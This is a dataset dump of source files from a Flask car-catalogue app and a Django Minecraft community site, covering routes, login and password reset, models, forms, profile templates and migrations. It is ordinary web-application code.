flash('Please do not enter more than 30 characters in a search')\n return render_template('list_manufacturers.html',\n page_title=\"MANUFACTURER LIST\",\n manufacturers=manufacturers)\n\n\n# route to show all matches for a user's search on the manufacturer page\[email protected]('/manufacturersearch/<search>', methods=['GET', 'POST'])\ndef manufacturersearch(search):\n manufacturer = models.Manufacturer.query.filter(models.Manufacturer.name.ilike('%{}%'.format(search))).all()\n print(manufacturer)\n for i in manufacturer:\n print(i.name)\n return render_template('msearch.html', page_title=\"YOUR SEARCH\",\n manufacturer=manufacturer)\n\n\n# route that shows more info on the manufacturer the user opened\[email protected]('/manufacturer/<int:info>')\ndef manufacturer(info):\n manufacturer = models.Manufacturer.query.filter_by(id=info).first()\n # gets cars manufacturer made by getting all cars that have the\n # same manufacturer id as the current manufacturer's id\n cars = models.Car.query.filter_by(manufacturerid=manufacturer.id).all()\n title = manufacturer.name\n return render_template('show_manufacturers.html', page_title=title,\n manufacturer=manufacturer, cars=cars)\n\n\n# route to handle logins for the user\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n # redirect users back if they are already logged in\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n # if form works:\n if form.validate_on_submit():\n # checks if username is in the database\n user = models.User.query.filter_by(username=form.username.data).first()\n # if it doesn't exist yet:\n if user is None or not user.check_password(form.password.data):\n # tell user login didn't work and go back to login page\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n # gets contents of flask's request variable that contains all the info\n # that the user sent with their request\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n # sends users home if nothing obtained from form\n next_page = url_for('home')\n return redirect(url_for('home'))\n return render_template('login.html', title='Sign In', form=form)\n\n\n# route to handle sign ups for the user\[email protected]('/signup', methods=['GET', 'POST'])\ndef signup():\n # sends users home if already logged in\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n # puts username, email, and password into the database\n user = models.User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n # tells user they are signed up and sends them to login page\n flash('Congratulations, you are now a registered user!')\n return redirect(url_for('login'))\n return render_template('signup.html', title='Sign up', form=form)\n\n\n# route to handle logging out for the user\[email protected]('/logout')\ndef logout():\n # uses flask's built-in logout feature and sends user's home after\n # logging out\n logout_user()\n return redirect(url_for('home'))\n\n\n# route that shows the user's current profile (if logged in)\[email protected]('/profile/<username>')\ndef profile(username):\n # if user is not signed in:\n if current_user.is_anonymous:\n # tell user to log in before going to their profile, and sends them home\n flash(\"Please log in or sign up before attempting to view your profile!\")\n return redirect(url_for('home'))\n # gets the corresponding info from database for the current user\n profile = models.User.query.filter_by(username=username).first_or_404()\n favcars = models.UserCar.query.filter_by(uid=current_user.id).all()\n # puts user's favourite cars in a temporary list in order to call\n # everything that applies, and then calls from list (only working way I\n # could implement this function)\n templist = []\n for i in favcars:\n templist.append(i.cid)\n cars = models.Car.query.filter(models.Car.id.in_(templist)).all()\n return render_template('profile.html', title='Your Profile',\n profile=profile, cars=cars)\n\n# route to send email to user with link to reset password page\[email protected]('/reset_password_request', methods=['GET', 'POST'])\ndef reset_password_request():\n # if user is already logged in:\n if current_user.is_authenticated:\n # send user home\n return redirect(url_for('home'))\n form = ResetPasswordRequestForm()\n if form.validate_on_submit():\n # gets email to send password reset to and sends\n user = models.User.query.filter_by(email=form.email.data).first()\n if user:\n send_password_reset_email(user)\n # tells user to check email for reset password link and sends them to\n # login page\n flash('Check your email for the instructions to reset your password')\n return redirect(url_for('login'))\n return render_template('reset_password_request.html',\n title='Reset Password', form=form)\n\n\n# route to reset password (link to route obtained from email)\[email protected]('/reset_password/<token>', methods=['GET', 'POST'])\ndef reset_password(token):\n # if user is already logged in:\n if current_user.is_authenticated:\n # send them home\n return redirect(url_for('home'))\n user = models.User.verify_reset_password_token(token)\n # if token can't be verified to being requested by current user:\n if not user:\n # send them home\n return redirect(url_for('home'))\n form = ResetPasswordForm()\n if form.validate_on_submit():\n # updates the username and password info in the database\n user.set_password(form.password.data)\n db.session.query(models.User).filter_by(id=user.id).update({models.User.password_hash: user.password_hash})\n db.session.commit()\n # tells user they have reset password successfully and sends them to\n # login page\n flash('Your password has been reset.')\n return redirect(url_for('login'))\n return render_template('reset_password.html', form=form)\n\n\n# error handler for a 404 error (returns 404.html instead of standard 404 page)\[email protected](404)\ndef page_not_found(e):\n return render_template(\"404.html\")\n\n\n# error handler for a 500 error (returns 500.html instead of standard 500 page)\[email protected](500)\ndef internal_server(e):\n return render_template(\"500.html\")\n\n\n# keeps track of user by storing id when they visit a page, and then uses this\n# id to load the user into memory\[email protected]_loader\ndef load_user(id):\n return models.User.query.get(int(id))\n\n\n# tells flask what port to run on\nif __name__ == \"__main__\":\n app.run(debug=False, port=1111)\n" }, { "alpha_fraction": 0.651153028011322, "alphanum_fraction": 0.6628930568695068, "avg_line_length": 33.565216064453125, "blob_id": "5748eddd27b61e1f8a43b864fbe142bcb0daec2f", "content_id": "1f0fefce9fb529fde61da6e93157a84fddf9a4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2385, "license_type": "no_license", "max_line_length": 86, "num_lines": 69, "path": "/models.py", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": "from routes import db, app\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_login import UserMixin\nfrom time import time\nimport jwt\n\n\n# defines rows in Car table\nclass Car(db.Model):\n __tablename__ = 'Car'\n\n id = db.Column(db.Integer, primary_key=True, nullable=False, unique=True)\n name = db.Column(db.Text(50), nullable=False)\n horsepower = db.Column(db.Text, nullable=False)\n cost = db.Column(db.Text, nullable=False)\n wheeldrive = db.Column(db.Text, nullable=False)\n weight = db.Column(db.Text, nullable=False)\n image = db.Column(db.Text)\n manufacturerid = db.Column(db.Text, db.ForeignKey('Manufacturer.id'))\n\n\n# defines rows in Manufacturer table\nclass Manufacturer(db.Model):\n __tablename__ = 'Manufacturer'\n\n id = db.Column(db.Integer, primary_key=True, nullable=False, unique=True)\n name = db.Column(db.Text(50), nullable=False)\n details = db.Column(db.Text(250), nullable=False)\n\n\n# defines rows in User table\nclass User(UserMixin, db.Model):\n __tablename__ = 'User'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(64), index=True, unique=True)\n password_hash = db.Column(db.String(128))\n email = db.Column(db.String(128))\n\n # tells Python how to print objects of this class for debugging purposes\n def __repr__(self):\n return '<User {}>'.format(self.username)\n\n def set_password(self, password):\n self.password_hash = generate_password_hash(password)\n\n def check_password(self, password):\n return check_password_hash(self.password_hash, password)\n\n # encoding token using sha256 algorithm\n def get_reset_password_token(self, expires_in=600):\n return jwt.encode({'reset_password': self.id, 'exp': time() + expires_in},\n app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8')\n\n @staticmethod\n def verify_reset_password_token(token):\n try:\n id = jwt.decode(token, app.config['SECRET_KEY'],\n algorithms=['HS256'])['reset_password']\n except:\n return\n return User.query.get(id)\n\n\n# defines rows in UserCar table\nclass UserCar(db.Model):\n __tablename__ = 'UserCar'\n id = db.Column(db.Integer, primary_key=True)\n uid = db.Column(db.ForeignKey('User.id'))\n cid = db.Column(db.ForeignKey('Car.id'))\n" }, { "alpha_fraction": 0.594936728477478, "alphanum_fraction": 0.594936728477478, "avg_line_length": 32.71428680419922, "blob_id": "2c3c822221d375960d8f08533c94a0e8842ddb89", "content_id": "ba3c3bef07bf6847611291f1b7d50e649df2730f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 474, "license_type": "no_license", "max_line_length": 77, "num_lines": 14, "path": "/static/js.js", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": " // jQuery functionality for all forms (except delete), to stop double submits\n\n // disable submit button after first click to avoid spam clicks\n $(document).ready(function() {\n // define fields as variables\n var submit_button = $('input#submit');\n var form = $('form#signupform')\n // on submit, disable submit button\n form.submit(function() {\n if (form) {\n submit_button.prop('disabled', true);\n }\n });\n });\n" } ]
4
Kikono1014/Marupik_site
https://github.com/Kikono1014/Marupik_site
44384d1e6df5d4a888fe147c12a0389dcd38b532
3232516e343bc6edc0653def6e7db760506e305a
ac30f5849fde5d972f5ea31093aa7d5e0aa6acb3
refs/heads/main
2023-08-11T06:59:58.663913
2021-09-12T20:47:15
2021-09-12T20:47:15
379,552,319
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5289201736450195, "alphanum_fraction": 0.5401363372802734, "avg_line_length": 33.70228958129883, "blob_id": "b504884a985506507cce4c74db7e07fde680ee8f", "content_id": "b46517de095590b5d94b84f80731636cc0c1ff1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 4757, "license_type": "no_license", "max_line_length": 198, "num_lines": 131, "path": "/blog/templates/profile/another_profile_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n\n<!DOCTYPE html>\n\n<html>\n\n\t<head>\n\t\t{% include 'parts_of_page/pages_head.html' %}\n\n\t</head>\n\n\n\t<body>\n\n\n\n\t\t<div class=\"wrapper\">\n\n\t\t\t{% include 'parts_of_page/header.html' %}\n\n\t\t\t{% include 'parts_of_page/news.html' %}\n\n\t\t\t<div class=\"content\">\n\t\t\t\t<div class=\"profile_page\">\n\t\t\t\t\t<div class=\"img_div\">\n\t\t\t\t\t\t<img src=\"{{user_image}}\" width=\"100%\">\n\t\t\t\t\t</div>\n\t\t\t\t\t<div class=\"profile_div username\"><p style=\"font-size: 35px; color: {{role_color}}\">{{ username }}</p></div>\n\t\t\t\t\t<div class=\"profile_div full_info\">\n\t\t\t\t\t\t{% for info in full_info %}\n\t\t\t\t\t\t\t<p>{{ info }}</p>\n\t\t\t\t\t\t{% endfor %}\n\t\t\t\t\t</div>\n\n\t\t\t\t\t\n\n\t\t\t\t\t<div class=\"profile_div role\"><p>Роль на сайте: {{ role }} {% if admin %}+ Он ещё и админ{% endif %}</p></div>\n\n\t\t\t\t\t{% if admin or 'Представитель города' in role %}\n\t\t\t\t\t\t<form method=\"POST\" class=\"register_and_login\" style=\"margin-top: 10px\">\n\t\t\t\t\t\t\t{% csrf_token %}\n\t\t\t\t\t\t\t<div class=\"profile_div roles\">\n\t\t\t\t\t\t\t\t{% for choice in profile_form.role %}\n\t\t\t\t\t\t\t\t\t<div>\n\t\t\t\t\t\t\t\t <p>{{ choice }}</p>\n\t\t\t\t\t\t\t </div>\n\t\t\t\t\t\t\t {% endfor %}\n\t\t\t\t\t\t </div>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Сохранить изменения</button>\n\t\t\t\t\t\t</form>\n\t\t\t\t\t{% endif %}\n\n\n\t\t\t\t\t<div class=\"comments_block\">\n\n\t\t\t\t\t<h1 class=\"title\">Коментарии:</h1>\n\t\t\t\t\t\n\t\t\t\t\t{% if islogin %}\n\t\t\t\t\t\t<div class=\"add_comment\">\n\t\t\t\t\t\t\t<p>Написать новый коментарий:</p>\n\t\t\t\t\t\t\t<form class=\"add_something\" method=\"post\">\n\t\t\t\t\t\t\t\t{% csrf_token %}\n\t\t\t\t\t\t\t\t<p>{{ comment_form.body }}</p>\n\t\t\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Добавить</button>\n\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t</div>\n\t\t\t\t\t{% else %}\n\t\t\t\t\t\t<p>Зарегистрируйтесь, что бы написать коментарий</p>\n\t\t\t\t\t{% endif %}\n\n\n\t\t\t\t\t<div class=\"comment_list\">\n\t\t\t\t\t\t\t{% for comment in comments %}\n\t\t\t\t\t\t\t\t<div class=\"comment\" id=\"comment\" style=\"min-height: 350px;\">\n\t\t\t\t\t\t\t\t\t<div class=\"info\">\n\t\t\t\t\t\t\t\t\t\t<a href=\"{%url 'another_profile' user_id=comment.userid%}\"><div class=\"image_div\"><img src=\"{{comment.image}}\" width=\"100%\"></div></a>\n\t\t\t\t\t\t\t\t\t\t{% if 'Представитель города' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: rgb(200, 0, 200)\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif 'ФБР' in comment.role or 'Глава ФБР' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: blue}\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif 'Мэр' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: brown\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif 'Журналист' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: rgb(0, 200, 100)\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif style_file == 'css/light1.css' or style_file == 'css/purple_gold.css' %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: black\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% else %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: white; \"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% endif %}\n\t\t\t\t\t\t\t\t\t\t<p class=\"role\"> {{ comment.role }} </p>\n\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t<p class=\"created\"> {{ comment.created }} </p>\n\t\t\t\t\t\t\t\t\t<div class=\"text\">\n\t\t\t\t\t\t\t\t\t\t<p>{{ comment.body }}</p>\n\t\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t\t{% if request.user.username == comment.name or request.user.username == username or request.user.profile.admin %}\n\t\t\t\t\t\t\t\t\t\t<div class=\"dropdown\">\n\t\t\t\t\t\t\t\t\t\t\t<i class=\"add material-icons\" style=\"font-size: 30px; \">more_vert</i>\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"dropdown-content\">\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"{%url 'user_comment_delete' comment_id=comment.pk user_id=user.pk%}\"><i class=\"profile material-icons\" style=\"font-size: 25px; color: #e82323;\">delete</i></a>\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t{% endif %}\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t{% empty %}\n\t\t\t\t\t\t\t\t<p>Здесь нету ни одного комментария</p>\n\t\t\t\t\t\t\t{% endfor %}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t</div>\n\n\t\t\t\t</div>\n\n\t\t\t\n\t\t\t</div>\n\n\t\t\t{% include 'parts_of_page/footer.html' %}\n\n\t\t</div>\n\n\n\n\t</body>\n\n</html>\n\n" }, { "alpha_fraction": 0.539959728717804, "alphanum_fraction": 0.5419744849205017, "avg_line_length": 19.27142906188965, "blob_id": "4db94926336b89258dbc5afdd0dd38165a226f39", "content_id": "02c5db0e4b5ee36225561c88b86b7cc8ab0843d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 103, "num_lines": 140, "path": "/blog/forms.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\nfrom django import forms\r\nfrom .models import Profile, News, Article, City, Penetration, NewsComment, UserComment, ArticleComment\r\nfrom django.contrib.auth.models import User\r\n\r\n\r\nclass NewsCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = ('body',)\r\n\r\nclass ArticleCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = ArticleComment\r\n fields = ('body',)\r\n\r\n\r\nclass Add_nuwsForm(forms.ModelForm):\r\n class Meta:\r\n model = News\r\n fields = ('image', 'title', 'text',)\r\n\r\nclass DeleteNewsForm(forms.ModelForm):\r\n class Meta:\r\n model = News\r\n fields = []\r\n\r\n\r\nclass DeleteArticleForm(forms.ModelForm):\r\n class Meta:\r\n model = Article\r\n fields = []\r\n\r\nclass DeleteCityForm(forms.ModelForm):\r\n class Meta:\r\n model = City\r\n fields = []\r\n\r\nclass EditNewsCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = ('body',)\r\n\r\n\r\nclass DeleteNewsCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = []\r\n\r\n\r\n\r\nclass AddArticleForm(forms.ModelForm):\r\n class Meta:\r\n model = Article\r\n fields = ('image', 'title', 'text',)\r\n\r\n\r\nclass EditArticleCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = ('body',)\r\n\r\n\r\nclass DeleteArticleCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = []\r\n\r\n\r\nclass UserCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = UserComment\r\n fields = ('body',)\r\n\r\nclass DeleteUserCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = UserComment\r\n fields = []\r\n\r\n\r\nclass UserForm(forms.ModelForm):\r\n class Meta:\r\n model = User\r\n fields = ('username',)\r\n\r\n\r\n\r\n\r\nclass ProfileForm(forms.ModelForm):\r\n class Meta:\r\n model = Profile\r\n\r\n fields = ('user_image', 'info',)\r\n\r\n\r\nclass ChangeProfileRoleForm(forms.ModelForm):\r\n class Meta:\r\n model = Profile\r\n\r\n fields = ('role',)\r\n\r\n\r\nclass Add_citeForm(forms.ModelForm):\r\n class Meta:\r\n model = City\r\n fields = (\r\n 'image',\r\n 'image1',\r\n 'image2',\r\n 'image3',\r\n 'image4',\r\n 'image5',\r\n 'title',\r\n 'text',\r\n 'smol_text',\r\n 'status',\r\n 'contact_url',\r\n 'mayor'\r\n )\r\n\r\n\r\nclass PenetrationForm(forms.ModelForm):\r\n class Meta:\r\n model = Penetration\r\n fields = (\r\n 'minecraft_nickname',\r\n 'donation_username',\r\n 'free_token',\r\n 'donation_image',\r\n 'description_yourself',\r\n 'how_you_know',\r\n 'contact',\r\n 'status'\r\n )\r\n\r\n\r\nclass EditPenetrationForm(forms.ModelForm):\r\n class Meta:\r\n model = Penetration\r\n fields = ('status',)\r\n" }, { "alpha_fraction": 0.5121951103210449, "alphanum_fraction": 0.5609756112098694, "avg_line_length": 28.81818199157715, "blob_id": "4f09b854aaccc110afd43ec0d7a6aae1ee74caa2", "content_id": "a613869104ee10f0f55a1715c737c845a7a1cc04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 212, "num_lines": 22, "path": "/blog/migrations/0033_auto_20210720_2057.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 17:57\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0032_auto_20210720_2050'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='profile',\n name='favorite_fruit',\n ),\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=models.CharField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=9),\n ),\n ]\n" }, { "alpha_fraction": 0.5152636170387268, "alphanum_fraction": 0.5198889970779419, "avg_line_length": 15.615385055541992, "blob_id": "346e9196314429f3c42f41821df80c908e6274bb", "content_id": "c92b9002f30fb1ff5c684a7d428a9831ce0da7b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1099, "license_type": "no_license", "max_line_length": 108, "num_lines": 65, "path": "/blog/templates/profile/upgrade_profile_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n\n<!DOCTYPE html>\n\n<html>\n\n\t<head>\n\t\t{% include 'parts_of_page/pages_head.html' %}\n\n\t</head>\n\n\n\t<body>\n\n\n\n\t\t<div class=\"wrapper\">\n\n\t\t\t{% include 'parts_of_page/header.html' %}\n\n\t\t\t{% include 'parts_of_page/news.html' %}\n\n\t\t\t<div class=\"content\">\n\t\t\t\t<div class=\"profile\">\n\t\t\t\t\t<form method=\"POST\" enctype=\"multipart/form-data\" class=\"register_and_login\" style=\"margin-top: 10px\">\n\t\t\t\t\t\t{% csrf_token %}\n\t\t\t\t\t\t<div class=\"image_div\">\n\t\t\t\t\t\t\t<img src=\"{{user_image}}\" width=\"100%\">\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t<div class=\"add_image\">\n\t\t\t\t\t\t\t{{ profile_form.user_image }}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t<div class=\"change_username\">\n\t\t\t\t\t\t\t{{ user_form.as_p }}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t<div class=\"change_info\">\n\t\t\t\t\t\t\t{{ profile_form.info }}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\n\n\t\t\t\t\t\t<div class=\"errors\">\t\n\t\t\t\t\t\t\t{% for err in error %}\n\t\t\t\t\t\t\t\t<p>{{err}}</p>\n\t\t\t\t\t\t\t{% endfor %}\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Сохранить изменения</button>\n\t\t\t\t\t</form>\n\t\t\t\t</div>\n\n\t\t\t\n\t\t\t</div>\n\n\t\t\t{% include 'parts_of_page/footer.html' %}\n\n\t\t</div>\n\n\n\n\t</body>\n\n</html>\n\n" }, { "alpha_fraction": 0.4957118332386017, "alphanum_fraction": 0.5385934710502625, "avg_line_length": 23.34782600402832, "blob_id": "bffc6619c7f8706bc14a773f04c36293abbe940e", "content_id": "39e455f0a0473141d9dfbb7d0b2d0680ebd16148", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 588, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/blog/migrations/0024_auto_20210622_2014.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 17:14\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0023_comment'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='comment',\r\n name='image',\r\n field=models.CharField(default='none', max_length=300),\r\n ),\r\n migrations.AddField(\r\n model_name='comment',\r\n name='user_role',\r\n field=models.CharField(default='Игрок', max_length=100),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.53794264793396, "alphanum_fraction": 0.5919055938720703, "avg_line_length": 31.94444465637207, "blob_id": "93d2399e78f9fc324eb16c39e393930580c5e37d", "content_id": "e8e9cc60ec65f0913a1f35731f626e38c427be7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 667, "license_type": "no_license", "max_line_length": 261, "num_lines": 18, "path": "/blog/migrations/0034_alter_profile_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 18:15\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0033_auto_20210720_2057'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=models.CharField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default=None, max_length=9, null=True, verbose_name='Do you own a Smartphone?'),\n ),\n ]\n" }, { "alpha_fraction": 0.5258620977401733, "alphanum_fraction": 0.5926724076271057, "avg_line_length": 23.77777862548828, "blob_id": "8f8f716301dbb246bc524fe909be2445dadceb21", "content_id": "9e17abe76640468470ee4f4d930d1b496b506eb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 116, "num_lines": 18, "path": "/blog/migrations/0008_profile_info.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-18 13:57\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0007_auto_20210618_1239'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='profile',\r\n name='info',\r\n field=models.TextField(default='Проходивший мимо пользователь сайта, который ничего о себе не написал'),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4914425313472748, "alphanum_fraction": 0.567237138748169, "avg_line_length": 20.72222137451172, "blob_id": "62d6b2c41db54adc21f7c4accd4150f126c9b8f0", "content_id": "5b7a340e56d55f941d9a0010949236a1e8e45733", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/blog/migrations/0022_alter_profile_registered.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 13:23\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0021_auto_20210622_1616'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='registered',\r\n field=models.BooleanField(default=False),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5321518778800964, "alphanum_fraction": 0.5584810376167297, "avg_line_length": 40.14583206176758, "blob_id": "cca82b6bc8dc3c6451a1625c23d39027824ee836", "content_id": "91621cd5eb573fae79fd158d85a87612cf9cf27f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1980, "license_type": "no_license", "max_line_length": 136, "num_lines": 48, "path": "/blog/migrations/0030_auto_20210719_1639.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-19 13:39\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0029_auto_20210719_1524'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ImageField(upload_to='article/image/')),\n ('title', models.CharField(max_length=1000)),\n ('text', models.TextField()),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.RenameModel(\n old_name='Comment',\n new_name='NewsComment',\n ),\n migrations.CreateModel(\n name='ArticleComment',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.CharField(default='none', max_length=300)),\n ('name', models.CharField(max_length=100)),\n ('userid', models.CharField(default=3, max_length=1000)),\n ('role', models.CharField(default='Игрок', max_length=100)),\n ('body', models.TextField()),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.article')),\n ],\n options={\n 'ordering': ('created',),\n },\n ),\n ]\n" }, { "alpha_fraction": 0.528363049030304, "alphanum_fraction": 0.5429497361183167, "avg_line_length": 32.924530029296875, "blob_id": "4ff56ca1da3d54fd6ea342e840666a78d218a210", "content_id": "b65514a0605b26a526e222742b017d1a079d634e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1851, "license_type": "no_license", "max_line_length": 115, "num_lines": 53, "path": "/blog/migrations/0017_auto_20210621_2136.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-21 18:36\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0016_city_mayor'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='city',\r\n name='image1',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image2',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image3',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n 